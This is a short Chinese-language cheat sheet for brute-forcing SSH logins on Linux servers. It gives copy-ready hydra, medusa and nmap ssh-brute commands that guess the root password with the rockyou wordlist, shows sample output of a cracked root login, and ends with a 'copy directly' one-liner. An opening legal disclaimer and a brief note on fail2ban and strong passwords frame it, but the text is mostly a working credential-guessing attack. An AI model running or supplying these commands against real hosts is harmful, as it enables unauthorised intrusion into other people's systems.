⚠️ 重要声明未经授权远程爆破、登录他人 Linux 系统属于严重违法犯罪行为,仅可用于自己的服务器、授权渗透测试环境。一、适用场景
- 目标 Linux 开启了 SSH 服务(默认 22 端口)
二、使用工具:hydra(Kali 自带)
1. 单个用户名 + 密码字典
hydra -l root -P /usr/share/wordlists/rockyou.txt 目标IP ssh -t 4
示例:
hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.1.100 ssh -t 4
2. 用户名字典 + 密码字典
hydra -L 用户字典.txt -P 密码字典.txt 目标IP ssh
3. 非 22 端口的 SSH
hydra -l root -P 字典.txt 目标IP ssh -s 2222
三、使用工具:medusa(替代方案)
medusa -h 目标IP -u root -P 字典.txt -M ssh
四、使用工具:nmap 脚本爆破
nmap -p 22 --script ssh-brute --script-args userdb=用户.txt,passdb=密码.txt 目标IP
五、成功标志
出现类似内容:
[22][ssh] host: 192.168.1.100 login: root password: 123456
六、现实限制(非常重要)
- Linux 大多有 防暴力破解(fail2ban、防火墙),爆破几次 IP 就会被拉黑
- 强密码(12位以上大小写数字符号)几乎不可能爆破成功
七、最简可用命令(直接复制)
gunzip /usr/share/wordlists/rockyou.txt.gzhydra -l root -P /usr/share/wordlists/rockyou.txt 目标IP ssh